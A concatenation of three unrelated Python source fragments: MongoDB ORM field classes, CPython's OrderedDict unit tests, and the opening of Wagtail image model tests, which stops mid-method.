''' Checks that ``value`` is a pymongo ``ObjectId`` or a string
representation of one'''
if (not isinstance(value, ObjectId)
and not isinstance(value, basestring)
and not isinstance(value, bytes)
):
self._fail_validation_type(value, ObjectId)
if isinstance(value, ObjectId):
return
#: bytes
if len(value) == 12:
return
# hex
if len(value) != 24:
self._fail_validation(value, 'hex object ID is the wrong length')
def wrap(self, value, session=None):
''' Validates that ``value`` is an ObjectId (or hex representation
of one), then returns it '''
self.validate_wrap(value)
if isinstance(value, bytes) or isinstance(value, basestring):
return ObjectId(value)
return value
def unwrap(self, value, session=None):
''' Validates that ``value`` is an ObjectId, then returns it '''
self.validate_unwrap(value)
return value
class ComputedField(Field):
''' A computed field is generated based on an object's other values. It
will generally be created with the @computed_field decorator, but
can be passed an arbitrary function.
The function should take a dict which will contains keys with the names
of the dependencies mapped to their values.
The computed value is recalculated every the field is accessed unless
the one_time field is set to True.
Example::
>>> class SomeDoc(Document):
... @computed_field
... def last_modified(obj):
... return datetime.datetime.utcnow()
.. warning::
The computed field interacts in an undefined way with partially loaded
documents right now. If using this class watch out for strange behaviour.
'''
valid_modifiers = SCALAR_MODIFIERS
auto = True
def __init__(self,
computed_type,
fun,
one_time=False,
deps=None,
**kwargs):
''' :param fun: the function to compute the value of the computed field
:param computed_type: the type to use when wrapping the computed field
:param deps: the names of fields on the current object which should be \
passed in to compute the value
'''
super(ComputedField, self).__init__(**kwargs)
self.computed_type = computed_type
if deps is None:
deps = set()
self.deps = set(deps)
self.fun = fun
self.one_time = one_time
self.__cached_value = UNSET
def schema_json(self):
super_schema = super(ComputedField, self).schema_json()
return dict(computed_type=self.computed_type.schema_json(),
one_time=self.one_time,
deps=list(self.deps), **super_schema)
def __get__(self, instance, owner):
# class method
if instance is None:
return QueryField(self)
obj_value = instance._values[self._name]
if obj_value.set and self.one_time:
return obj_value.value
computed_value = self.compute_value(instance)
if self.one_time:
self.set_value(instance, computed_value)
return computed_value
def __set__(self, instance, value):
obj_value = instance._values[self._name]
if obj_value.set and self.one_time:
raise BadValueException(self._name, value, 'Cannot set a one-time field once it has been set')
super(ComputedField, self).__set__(instance, value)
def set_parent_on_subtypes(self, parent):
self.computed_type._set_parent(parent)
def dirty_ops(self, instance):
dirty = False
for dep in self.deps:
dep_value = instance._values[dep._name]
if dep_value.dirty:
dirty = True
break
else:
if len(self.deps) > 0:
return {}
# make sure we recompute if this is a recompute-on-save
value = getattr(instance, self._name)
return {
self.on_update : {
self._name : self.wrap(value)
}
}
def compute_value(self, doc):
args = {}
for dep in self.deps:
args[dep._name] = getattr(doc, dep._name)
value = self.fun(args)
try:
self.computed_type.validate_wrap(value)
except BadValueException as bve:
self._fail_validation(value, 'Computed Function return a bad value', cause=bve)
return value
def wrap_value(self, value):
''' A function used to wrap a value used in a comparison. It will
first try to wrap as the sequence's sub-type, and then as the
sequence itself'''
return self.computed_type.wrap_value(value)
def validate_wrap(self, value):
''' Check that ``value`` is valid for unwrapping with ``ComputedField.computed_type``'''
try:
self.computed_type.validate_wrap(value)
except BadValueException as bve:
self._fail_validation(value, 'Bad value for computed field', cause=bve)
def validate_unwrap(self, value):
''' Check that ``value`` is valid for unwrapping with ``ComputedField.computed_type``'''
try:
self.computed_type.validate_unwrap(value)
except BadValueException as bve:
self._fail_validation(value, 'Bad value for computed field', cause=bve)
def wrap(self, value):
''' Validates ``value`` and wraps it with ``ComputedField.computed_type``'''
self.validate_wrap(value)
return self.computed_type.wrap(value)
def unwrap(self, value, session=None):
''' Validates ``value`` and unwraps it with ``ComputedField.computed_type``'''
self.validate_unwrap(value)
return self.computed_type.unwrap(value, session=session)
class computed_field(object):
def __init__(self, computed_type, deps=None, **kwargs):
self.computed_type = computed_type
self.deps = deps
self.kwargs = kwargs
def __call__(self, fun):
return ComputedField(self.computed_type, fun, deps=self.deps, **self.kwargs)
def CreatedField(name='created', tz_aware=False, **kwargs):
''' A shortcut field for creation time. It sets the current date and time
when it enters the database and then doesn't update on further saves.
If you've used the Django ORM, this is the equivalent of auto_now_add
:param tz_aware: If this is True, the value will be returned in the
local time of the session. It is always saved in UTC
'''
@computed_field(DateTimeField(), one_time=True, **kwargs)
def created(obj):
if tz_aware:
import pytz
return pytz.utc.localize(datetime.utcnow())
return datetime.utcnow()
created.__name__ = name
return created
class ModifiedField(DateTimeField):
''' A shortcut field for modified time. It sets the current date and time
when it enters the database and then updates when the document is
saved or updated
If you've used the Django ORM, this is the equivalent of auto_now
**WARNINGS**: When this field's parent object is sent to the database
its modified time is set. The local copy is not updated for technical
reasons. Hopefully this will not be the case in the future.
:param tz_aware: If this is True, the value will be returned in the
local time of the session. It is always saved in UTC
'''
def __init__(self, tz_aware=False, **kwargs):
if 'use_tz' not in kwargs:
kwargs['use_tz'] = tz_aware
kwargs['default_f'] = lambda: self.__value()
super(ModifiedField, self).__init__(**kwargs)
def __value(self):
if self.use_tz:
import pytz
return pytz.utc.localize(datetime.utcnow())
return datetime.utcnow()
def wrap(self, obj):
value = self.__value()
return value
def __get__(self, instance, owner):
# class method
if instance is None:
return QueryField(self)
obj_value = instance._values[self._name]
if obj_value.set:
return obj_value.value
value = self.__value()
self.set_value(instance, value)
return value
| |
import builtins
import contextlib
import copy
import gc
import pickle
from random import randrange, shuffle
import struct
import sys
import unittest
import weakref
from collections.abc import MutableMapping
from test import mapping_tests, support
py_coll = support.import_fresh_module('collections', blocked=['_collections'])
c_coll = support.import_fresh_module('collections', fresh=['_collections'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
class OrderedDictTests:
def test_init(self):
OrderedDict = self.OrderedDict
with self.assertRaises(TypeError):
OrderedDict([('a', 1), ('b', 2)], None) # too many args
pairs = [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5)]
self.assertEqual(sorted(OrderedDict(dict(pairs)).items()), pairs) # dict input
self.assertEqual(sorted(OrderedDict(**dict(pairs)).items()), pairs) # kwds input
self.assertEqual(list(OrderedDict(pairs).items()), pairs) # pairs input
self.assertEqual(list(OrderedDict([('a', 1), ('b', 2), ('c', 9), ('d', 4)],
c=3, e=5).items()), pairs) # mixed input
# make sure no positional args conflict with possible kwdargs
self.assertEqual(list(OrderedDict(self=42).items()), [('self', 42)])
self.assertEqual(list(OrderedDict(other=42).items()), [('other', 42)])
self.assertRaises(TypeError, OrderedDict, 42)
self.assertRaises(TypeError, OrderedDict, (), ())
self.assertRaises(TypeError, OrderedDict.__init__)
# Make sure that direct calls to __init__ do not clear previous contents
d = OrderedDict([('a', 1), ('b', 2), ('c', 3), ('d', 44), ('e', 55)])
d.__init__([('e', 5), ('f', 6)], g=7, d=4)
self.assertEqual(list(d.items()),
[('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5), ('f', 6), ('g', 7)])
def test_update(self):
OrderedDict = self.OrderedDict
with self.assertRaises(TypeError):
OrderedDict().update([('a', 1), ('b', 2)], None) # too many args
pairs = [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5)]
od = OrderedDict()
od.update(dict(pairs))
self.assertEqual(sorted(od.items()), pairs) # dict input
od = OrderedDict()
od.update(**dict(pairs))
self.assertEqual(sorted(od.items()), pairs) # kwds input
od = OrderedDict()
od.update(pairs)
self.assertEqual(list(od.items()), pairs) # pairs input
od = OrderedDict()
od.update([('a', 1), ('b', 2), ('c', 9), ('d', 4)], c=3, e=5)
self.assertEqual(list(od.items()), pairs) # mixed input
# Issue 9137: Named argument called 'other' or 'self'
# shouldn't be treated specially.
od = OrderedDict()
od.update(self=23)
self.assertEqual(list(od.items()), [('self', 23)])
od = OrderedDict()
od.update(other={})
self.assertEqual(list(od.items()), [('other', {})])
od = OrderedDict()
od.update(red=5, blue=6, other=7, self=8)
self.assertEqual(sorted(list(od.items())),
[('blue', 6), ('other', 7), ('red', 5), ('self', 8)])
# Make sure that direct calls to update do not clear previous contents
# add that updates items are not moved to the end
d = OrderedDict([('a', 1), ('b', 2), ('c', 3), ('d', 44), ('e', 55)])
d.update([('e', 5), ('f', 6)], g=7, d=4)
self.assertEqual(list(d.items()),
[('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5), ('f', 6), ('g', 7)])
self.assertRaises(TypeError, OrderedDict().update, 42)
self.assertRaises(TypeError, OrderedDict().update, (), ())
self.assertRaises(TypeError, OrderedDict.update)
self.assertRaises(TypeError, OrderedDict().update, 42)
self.assertRaises(TypeError, OrderedDict().update, (), ())
self.assertRaises(TypeError, OrderedDict.update)
def test_init_calls(self):
calls = []
class Spam:
def keys(self):
calls.append('keys')
return ()
def items(self):
calls.append('items')
return ()
self.OrderedDict(Spam())
self.assertEqual(calls, ['keys'])
def test_fromkeys(self):
OrderedDict = self.OrderedDict
od = OrderedDict.fromkeys('abc')
self.assertEqual(list(od.items()), [(c, None) for c in 'abc'])
od = OrderedDict.fromkeys('abc', value=None)
self.assertEqual(list(od.items()), [(c, None) for c in 'abc'])
od = OrderedDict.fromkeys('abc', value=0)
self.assertEqual(list(od.items()), [(c, 0) for c in 'abc'])
def test_abc(self):
OrderedDict = self.OrderedDict
self.assertIsInstance(OrderedDict(), MutableMapping)
self.assertTrue(issubclass(OrderedDict, MutableMapping))
def test_clear(self):
OrderedDict = self.OrderedDict
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
shuffle(pairs)
od = OrderedDict(pairs)
self.assertEqual(len(od), len(pairs))
od.clear()
self.assertEqual(len(od), 0)
def test_delitem(self):
OrderedDict = self.OrderedDict
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
od = OrderedDict(pairs)
del od['a']
self.assertNotIn('a', od)
with self.assertRaises(KeyError):
del od['a']
self.assertEqual(list(od.items()), pairs[:2] + pairs[3:])
def test_setitem(self):
OrderedDict = self.OrderedDict
od = OrderedDict([('d', 1), ('b', 2), ('c', 3), ('a', 4), ('e', 5)])
od['c'] = 10 # existing element
od['f'] = 20 # new element
self.assertEqual(list(od.items()),
[('d', 1), ('b', 2), ('c', 10), ('a', 4), ('e', 5), ('f', 20)])
def test_iterators(self):
OrderedDict = self.OrderedDict
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
shuffle(pairs)
od = OrderedDict(pairs)
self.assertEqual(list(od), [t[0] for t in pairs])
self.assertEqual(list(od.keys()), [t[0] for t in pairs])
self.assertEqual(list(od.values()), [t[1] for t in pairs])
self.assertEqual(list(od.items()), pairs)
self.assertEqual(list(reversed(od)),
[t[0] for t in reversed(pairs)])
self.assertEqual(list(reversed(od.keys())),
[t[0] for t in reversed(pairs)])
self.assertEqual(list(reversed(od.values())),
[t[1] for t in reversed(pairs)])
self.assertEqual(list(reversed(od.items())), list(reversed(pairs)))
def test_detect_deletion_during_iteration(self):
OrderedDict = self.OrderedDict
od = OrderedDict.fromkeys('abc')
it = iter(od)
key = next(it)
del od[key]
with self.assertRaises(Exception):
# Note, the exact exception raised is not guaranteed
# The only guarantee that the next() will not succeed
next(it)
def test_sorted_iterators(self):
OrderedDict = self.OrderedDict
with self.assertRaises(TypeError):
OrderedDict([('a', 1), ('b', 2)], None)
pairs = [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5)]
od = OrderedDict(pairs)
self.assertEqual(sorted(od), [t[0] for t in pairs])
self.assertEqual(sorted(od.keys()), [t[0] for t in pairs])
self.assertEqual(sorted(od.values()), [t[1] for t in pairs])
self.assertEqual(sorted(od.items()), pairs)
self.assertEqual(sorted(reversed(od)),
sorted([t[0] for t in reversed(pairs)]))
def test_iterators_empty(self):
OrderedDict = self.OrderedDict
od = OrderedDict()
empty = []
self.assertEqual(list(od), empty)
self.assertEqual(list(od.keys()), empty)
self.assertEqual(list(od.values()), empty)
self.assertEqual(list(od.items()), empty)
self.assertEqual(list(reversed(od)), empty)
self.assertEqual(list(reversed(od.keys())), empty)
self.assertEqual(list(reversed(od.values())), empty)
self.assertEqual(list(reversed(od.items())), empty)
def test_popitem(self):
OrderedDict = self.OrderedDict
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
shuffle(pairs)
od = OrderedDict(pairs)
while pairs:
self.assertEqual(od.popitem(), pairs.pop())
with self.assertRaises(KeyError):
od.popitem()
self.assertEqual(len(od), 0)
def test_popitem_last(self):
OrderedDict = self.OrderedDict
pairs = [(i, i) for i in range(30)]
obj = OrderedDict(pairs)
for i in range(8):
obj.popitem(True)
obj.popitem(True)
obj.popitem(last=True)
self.assertEqual(len(obj), 20)
def test_pop(self):
OrderedDict = self.OrderedDict
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
shuffle(pairs)
od = OrderedDict(pairs)
shuffle(pairs)
while pairs:
k, v = pairs.pop()
self.assertEqual(od.pop(k), v)
with self.assertRaises(KeyError):
od.pop('xyz')
self.assertEqual(len(od), 0)
self.assertEqual(od.pop(k, 12345), 12345)
# make sure pop still works when __missing__ is defined
class Missing(OrderedDict):
def __missing__(self, key):
return 0
m = Missing(a=1)
self.assertEqual(m.pop('b', 5), 5)
self.assertEqual(m.pop('a', 6), 1)
self.assertEqual(m.pop('a', 6), 6)
self.assertEqual(m.pop('a', default=6), 6)
with self.assertRaises(KeyError):
m.pop('a')
def test_equality(self):
OrderedDict = self.OrderedDict
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
shuffle(pairs)
od1 = OrderedDict(pairs)
od2 = OrderedDict(pairs)
self.assertEqual(od1, od2) # same order implies equality
pairs = pairs[2:] + pairs[:2]
od2 = OrderedDict(pairs)
self.assertNotEqual(od1, od2) # different order implies inequality
# comparison to regular dict is not order sensitive
self.assertEqual(od1, dict(od2))
self.assertEqual(dict(od2), od1)
# different length implied inequality
self.assertNotEqual(od1, OrderedDict(pairs[:-1]))
def test_copying(self):
OrderedDict = self.OrderedDict
# Check that ordered dicts are copyable, deepcopyable, picklable,
# and have a repr/eval round-trip
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
od = OrderedDict(pairs)
def check(dup):
msg = "\ncopy: %s\nod: %s" % (dup, od)
self.assertIsNot(dup, od, msg)
self.assertEqual(dup, od)
self.assertEqual(list(dup.items()), list(od.items()))
self.assertEqual(len(dup), len(od))
self.assertEqual(type(dup), type(od))
check(od.copy())
check(copy.copy(od))
check(copy.deepcopy(od))
# pickle directly pulls the module, so we have to fake it
with replaced_module('collections', self.module):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
check(pickle.loads(pickle.dumps(od, proto)))
check(eval(repr(od)))
update_test = OrderedDict()
update_test.update(od)
check(update_test)
check(OrderedDict(od))
def test_yaml_linkage(self):
OrderedDict = self.OrderedDict
# Verify that __reduce__ is setup in a way that supports PyYAML's dump() feature.
# In yaml, lists are native but tuples are not.
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
od = OrderedDict(pairs)
# yaml.dump(od) -->
# '!!python/object/apply:__main__.OrderedDict\n- - [a, 1]\n - [b, 2]\n'
self.assertTrue(all(type(pair)==list for pair in od.__reduce__()[1]))
def test_reduce_not_too_fat(self):
OrderedDict = self.OrderedDict
# do not save instance dictionary if not needed
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
od = OrderedDict(pairs)
self.assertIsInstance(od.__dict__, dict)
self.assertIsNone(od.__reduce__()[2])
od.x = 10
self.assertEqual(od.__dict__['x'], 10)
self.assertEqual(od.__reduce__()[2], {'x': 10})
def test_pickle_recursive(self):
OrderedDict = self.OrderedDict
od = OrderedDict()
od[1] = od
# pickle directly pulls the module, so we have to fake it
with replaced_module('collections', self.module):
for proto in range(-1, pickle.HIGHEST_PROTOCOL + 1):
dup = pickle.loads(pickle.dumps(od, proto))
self.assertIsNot(dup, od)
self.assertEqual(list(dup.keys()), [1])
self.assertIs(dup[1], dup)
def test_repr(self):
OrderedDict = self.OrderedDict
od = OrderedDict([('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)])
self.assertEqual(repr(od),
"OrderedDict([('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)])")
self.assertEqual(eval(repr(od)), od)
self.assertEqual(repr(OrderedDict()), "OrderedDict()")
def test_repr_recursive(self):
OrderedDict = self.OrderedDict
# See issue #9826
od = OrderedDict.fromkeys('abc')
od['x'] = od
self.assertEqual(repr(od),
"OrderedDict([('a', None), ('b', None), ('c', None), ('x', ...)])")
def test_setdefault(self):
OrderedDict = self.OrderedDict
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
shuffle(pairs)
od = OrderedDict(pairs)
pair_order = list(od.items())
self.assertEqual(od.setdefault('a', 10), 3)
# make sure order didn't change
self.assertEqual(list(od.items()), pair_order)
self.assertEqual(od.setdefault('x', 10), 10)
# make sure 'x' is added to the end
self.assertEqual(list(od.items())[-1], ('x', 10))
self.assertEqual(od.setdefault('g', default=9), 9)
# make sure setdefault still works when __missing__ is defined
class Missing(OrderedDict):
def __missing__(self, key):
return 0
self.assertEqual(Missing().setdefault(5, 9), 9)
def test_reinsert(self):
OrderedDict = self.OrderedDict
# Given insert a, insert b, delete a, re-insert a,
# verify that a is now later than b.
od = OrderedDict()
od['a'] = 1
od['b'] = 2
del od['a']
self.assertEqual(list(od.items()), [('b', 2)])
od['a'] = 1
self.assertEqual(list(od.items()), [('b', 2), ('a', 1)])
def test_move_to_end(self):
OrderedDict = self.OrderedDict
od = OrderedDict.fromkeys('abcde')
self.assertEqual(list(od), list('abcde'))
od.move_to_end('c')
self.assertEqual(list(od), list('abdec'))
od.move_to_end('c', 0)
self.assertEqual(list(od), list('cabde'))
od.move_to_end('c', 0)
self.assertEqual(list(od), list('cabde'))
od.move_to_end('e')
self.assertEqual(list(od), list('cabde'))
od.move_to_end('b', last=False)
self.assertEqual(list(od), list('bcade'))
with self.assertRaises(KeyError):
od.move_to_end('x')
with self.assertRaises(KeyError):
od.move_to_end('x', 0)
def test_move_to_end_issue25406(self):
OrderedDict = self.OrderedDict
od = OrderedDict.fromkeys('abc')
od.move_to_end('c', last=False)
self.assertEqual(list(od), list('cab'))
od.move_to_end('a', last=False)
self.assertEqual(list(od), list('acb'))
od = OrderedDict.fromkeys('abc')
od.move_to_end('a')
self.assertEqual(list(od), list('bca'))
od.move_to_end('c')
self.assertEqual(list(od), list('bac'))
def test_sizeof(self):
OrderedDict = self.OrderedDict
# Wimpy test: Just verify the reported size is larger than a regular dict
d = dict(a=1)
od = OrderedDict(**d)
self.assertGreater(sys.getsizeof(od), sys.getsizeof(d))
def test_views(self):
OrderedDict = self.OrderedDict
# See http://bugs.python.org/issue24286
s = 'the quick brown fox jumped over a lazy dog yesterday before dawn'.split()
od = OrderedDict.fromkeys(s)
self.assertEqual(od.keys(), dict(od).keys())
self.assertEqual(od.items(), dict(od).items())
def test_override_update(self):
OrderedDict = self.OrderedDict
# Verify that subclasses can override update() without breaking __init__()
class MyOD(OrderedDict):
def update(self, *args, **kwds):
raise Exception()
items = [('a', 1), ('c', 3), ('b', 2)]
self.assertEqual(list(MyOD(items).items()), items)
def test_highly_nested(self):
# Issue 25395: crashes during garbage collection
OrderedDict = self.OrderedDict
obj = None
for _ in range(1000):
obj = OrderedDict([(None, obj)])
del obj
support.gc_collect()
def test_highly_nested_subclass(self):
# Issue 25395: crashes during garbage collection
OrderedDict = self.OrderedDict
deleted = []
class MyOD(OrderedDict):
def __del__(self):
deleted.append(self.i)
obj = None
for i in range(100):
obj = MyOD([(None, obj)])
obj.i = i
del obj
support.gc_collect()
self.assertEqual(deleted, list(reversed(range(100))))
def test_delitem_hash_collision(self):
OrderedDict = self.OrderedDict
class Key:
def __init__(self, hash):
self._hash = hash
self.value = str(id(self))
def __hash__(self):
return self._hash
def __eq__(self, other):
try:
return self.value == other.value
except AttributeError:
return False
def __repr__(self):
return self.value
def blocking_hash(hash):
# See the collision-handling in lookdict (in Objects/dictobject.c).
MINSIZE = 8
i = (hash & MINSIZE-1)
return (i << 2) + i + hash + 1
COLLIDING = 1
key = Key(COLLIDING)
colliding = Key(COLLIDING)
blocking = Key(blocking_hash(COLLIDING))
od = OrderedDict()
od[key] = ...
od[blocking] = ...
od[colliding] = ...
od['after'] = ...
del od[blocking]
del od[colliding]
self.assertEqual(list(od.items()), [(key, ...), ('after', ...)])
def test_issue24347(self):
OrderedDict = self.OrderedDict
class Key:
def __hash__(self):
return randrange(100000)
od = OrderedDict()
for i in range(100):
key = Key()
od[key] = i
# These should not crash.
with self.assertRaises(KeyError):
list(od.values())
with self.assertRaises(KeyError):
list(od.items())
with self.assertRaises(KeyError):
repr(od)
with self.assertRaises(KeyError):
od.copy()
def test_issue24348(self):
OrderedDict = self.OrderedDict
class Key:
def __hash__(self):
return 1
od = OrderedDict()
od[Key()] = 0
# This should not crash.
od.popitem()
def test_issue24667(self):
"""
dict resizes after a certain number of insertion operations,
whether or not there were deletions that freed up slots in the
hash table. During fast node lookup, OrderedDict must correctly
respond to all resizes, even if the current "size" is the same
as the old one. We verify that here by forcing a dict resize
on a sparse odict and then perform an operation that should
trigger an odict resize (e.g. popitem). One key aspect here is
that we will keep the size of the odict the same at each popitem
call. This verifies that we handled the dict resize properly.
"""
OrderedDict = self.OrderedDict
od = OrderedDict()
for c0 in '0123456789ABCDEF':
for c1 in '0123456789ABCDEF':
if len(od) == 4:
# This should not raise a KeyError.
od.popitem(last=False)
key = c0 + c1
od[key] = key
# Direct use of dict methods
def test_dict_setitem(self):
OrderedDict = self.OrderedDict
od = OrderedDict()
dict.__setitem__(od, 'spam', 1)
self.assertNotIn('NULL', repr(od))
def test_dict_delitem(self):
OrderedDict = self.OrderedDict
od = OrderedDict()
od['spam'] = 1
od['ham'] = 2
dict.__delitem__(od, 'spam')
with self.assertRaises(KeyError):
repr(od)
def test_dict_clear(self):
OrderedDict = self.OrderedDict
od = OrderedDict()
od['spam'] = 1
od['ham'] = 2
dict.clear(od)
self.assertNotIn('NULL', repr(od))
def test_dict_pop(self):
OrderedDict = self.OrderedDict
od = OrderedDict()
od['spam'] = 1
od['ham'] = 2
dict.pop(od, 'spam')
with self.assertRaises(KeyError):
repr(od)
def test_dict_popitem(self):
OrderedDict = self.OrderedDict
od = OrderedDict()
od['spam'] = 1
od['ham'] = 2
dict.popitem(od)
with self.assertRaises(KeyError):
repr(od)
def test_dict_setdefault(self):
OrderedDict = self.OrderedDict
od = OrderedDict()
dict.setdefault(od, 'spam', 1)
self.assertNotIn('NULL', repr(od))
def test_dict_update(self):
OrderedDict = self.OrderedDict
od = OrderedDict()
dict.update(od, [('spam', 1)])
self.assertNotIn('NULL', repr(od))
def test_reference_loop(self):
# Issue 25935
OrderedDict = self.OrderedDict
class A:
od = OrderedDict()
A.od[A] = None
r = weakref.ref(A)
del A
gc.collect()
self.assertIsNone(r())
def test_free_after_iterating(self):
support.check_free_after_iterating(self, iter, self.OrderedDict)
support.check_free_after_iterating(self, lambda d: iter(d.keys()), self.OrderedDict)
support.check_free_after_iterating(self, lambda d: iter(d.values()), self.OrderedDict)
support.check_free_after_iterating(self, lambda d: iter(d.items()), self.OrderedDict)
class PurePythonOrderedDictTests(OrderedDictTests, unittest.TestCase):
module = py_coll
OrderedDict = py_coll.OrderedDict
class CPythonBuiltinDictTests(unittest.TestCase):
"""Builtin dict preserves insertion order.
Reuse some of tests in OrderedDict selectively.
"""
module = builtins
OrderedDict = dict
for method in (
"test_init test_update test_abc test_clear test_delitem " +
"test_setitem test_detect_deletion_during_iteration " +
"test_popitem test_reinsert test_override_update " +
"test_highly_nested test_highly_nested_subclass " +
"test_delitem_hash_collision ").split():
setattr(CPythonBuiltinDictTests, method, getattr(OrderedDictTests, method))
del method
@unittest.skipUnless(c_coll, 'requires the C version of the collections module')
class CPythonOrderedDictTests(OrderedDictTests, unittest.TestCase):
module = c_coll
OrderedDict = c_coll.OrderedDict
check_sizeof = support.check_sizeof
@support.cpython_only
def test_sizeof_exact(self):
OrderedDict = self.OrderedDict
calcsize = struct.calcsize
size = support.calcobjsize
check = self.check_sizeof
basicsize = size('nQ2P' + '3PnPn2P') + calcsize('2nP2n')
entrysize = calcsize('n2P')
p = calcsize('P')
nodesize = calcsize('Pn2P')
od = OrderedDict()
check(od, basicsize + 8*p + 8 + 5*entrysize) # 8byte indicies + 8*2//3 * entry table
od.x = 1
check(od, basicsize + 8*p + 8 + 5*entrysize)
od.update([(i, i) for i in range(3)])
check(od, basicsize + 8*p + 8 + 5*entrysize + 3*nodesize)
od.update([(i, i) for i in range(3, 10)])
check(od, basicsize + 16*p + 16 + 10*entrysize + 10*nodesize)
check(od.keys(), size('P'))
check(od.items(), size('P'))
check(od.values(), size('P'))
itersize = size('iP2n2P')
check(iter(od), itersize)
check(iter(od.keys()), itersize)
check(iter(od.items()), itersize)
check(iter(od.values()), itersize)
def test_key_change_during_iteration(self):
OrderedDict = self.OrderedDict
od = OrderedDict.fromkeys('abcde')
self.assertEqual(list(od), list('abcde'))
with self.assertRaises(RuntimeError):
for i, k in enumerate(od):
od.move_to_end(k)
self.assertLess(i, 5)
with self.assertRaises(RuntimeError):
for k in od:
od['f'] = None
with self.assertRaises(RuntimeError):
for k in od:
del od['c']
self.assertEqual(list(od), list('bdeaf'))
class PurePythonOrderedDictSubclassTests(PurePythonOrderedDictTests):
module = py_coll
class OrderedDict(py_coll.OrderedDict):
pass
class CPythonOrderedDictSubclassTests(CPythonOrderedDictTests):
module = c_coll
class OrderedDict(c_coll.OrderedDict):
pass
class PurePythonGeneralMappingTests(mapping_tests.BasicTestMappingProtocol):
@classmethod
def setUpClass(cls):
cls.type2test = py_coll.OrderedDict
def test_popitem(self):
d = self._empty_mapping()
self.assertRaises(KeyError, d.popitem)
@unittest.skipUnless(c_coll, 'requires the C version of the collections module')
class CPythonGeneralMappingTests(mapping_tests.BasicTestMappingProtocol):
@classmethod
def setUpClass(cls):
cls.type2test = c_coll.OrderedDict
def test_popitem(self):
d = self._empty_mapping()
self.assertRaises(KeyError, d.popitem)
class PurePythonSubclassMappingTests(mapping_tests.BasicTestMappingProtocol):
@classmethod
def setUpClass(cls):
class MyOrderedDict(py_coll.OrderedDict):
pass
cls.type2test = MyOrderedDict
def test_popitem(self):
d = self._empty_mapping()
self.assertRaises(KeyError, d.popitem)
@unittest.skipUnless(c_coll, 'requires the C version of the collections module')
class CPythonSubclassMappingTests(mapping_tests.BasicTestMappingProtocol):
@classmethod
def setUpClass(cls):
class MyOrderedDict(c_coll.OrderedDict):
pass
cls.type2test = MyOrderedDict
def test_popitem(self):
d = self._empty_mapping()
self.assertRaises(KeyError, d.popitem)
if __name__ == "__main__":
unittest.main()
| |
import unittest
from willow.image import Image as WillowImage
from django.test import TestCase
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group, Permission
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db.utils import IntegrityError
from django.db import connection
from wagtail.tests.utils import WagtailTestUtils
from wagtail.wagtailcore.models import Page
from wagtail.tests.testapp.models import EventPage, EventPageCarouselItem
from wagtail.wagtailimages.models import Rendition, Filter, SourceImageIOError
from wagtail.wagtailimages.rect import Rect
from .utils import Image, get_test_image_file
class TestImage(TestCase):
def setUp(self):
# Create an image for running tests on
self.image = Image.objects.create(
title="Test image",
file=get_test_image_file(),
)
def test_is_portrait(self):
self.assertFalse(self.image.is_portrait())
def test_is_landscape(self):
self.assertTrue(self.image.is_landscape())
def test_get_rect(self):
self.assertTrue(self.image.get_rect(), Rect(0, 0, 640, 480))
def test_get_focal_point(self):
self.assertEqual(self.image.get_focal_point(), None)
# Add a focal point to the image
self.image.focal_point_x = 100
self.image.focal_point_y = 200
self.image.focal_point_width = 50
self.image.focal_point_height = 20
# Get it
self.assertEqual(self.image.get_focal_point(), Rect(75, 190, 125, 210))
def test_has_focal_point(self):
self.assertFalse(self.image.has_focal_point())
# Add a focal point to the image
self.image.focal_point_x = 100
self.image.focal_point_y = 200
self.image.focal_point_width = 50
self.image.focal_point_height = 20
self.assertTrue(self.image.has_focal_point())
def test_set_focal_point(self):
self.assertEqual(self.image.focal_point_x, None)
self.assertEqual(self.image.focal_point_y, None)
self.assertEqual(self.image.focal_point_width, None)
self.assertEqual(self.image.focal_point_height, None)
self.image.set_focal_point(Rect(100, 150, 200, 350))
self.assertEqual(self.image.focal_point_x, 150)
self.assertEqual(self.image.focal_point_y, 250)
self.assertEqual(self.image.focal_point_width, 100)
self.assertEqual(self.image.focal_point_height, 200)
self.image.set_focal_point(None)
self.assertEqual(self.image.focal_point_x, None)
self.assertEqual(self.image.focal_point_y, None)
self.assertEqual(self.image.focal_point_width, None)
self.assertEqual(self.image.focal_point_height, None)
class TestImagePermissions(TestCase):
def setUp(self):
# Create some user accounts for testing permissions
User = get_user_model()
self.user = User.objects.create_user(username='user', email='user@email.com', password='password')
self.owner = User.objects.create_user(username='owner', email='owner@email.com', password='password')
self.editor = User.objects.create_user(username='editor', email='editor@email.com', password='password')
self.editor.groups.add(Group.objects.get(name='Editors'))
self.administrator = User.objects.create_superuser(username='administrator', email='administrator@email.com', password='password')
# Owner user must have the add_image permission
self.owner.user_permissions.add(Permission.objects.get(codename='add_image'))
# Create an image for running tests on
self.image = Image.objects.create(
title="Test image",
uploaded_by_user=self.owner,
file=get_test_image_file(),
)
def test_administrator_can_edit(self):
self.assertTrue(self.image.is_editable_by_user(self.administrator))
def test_editor_can_edit(self):
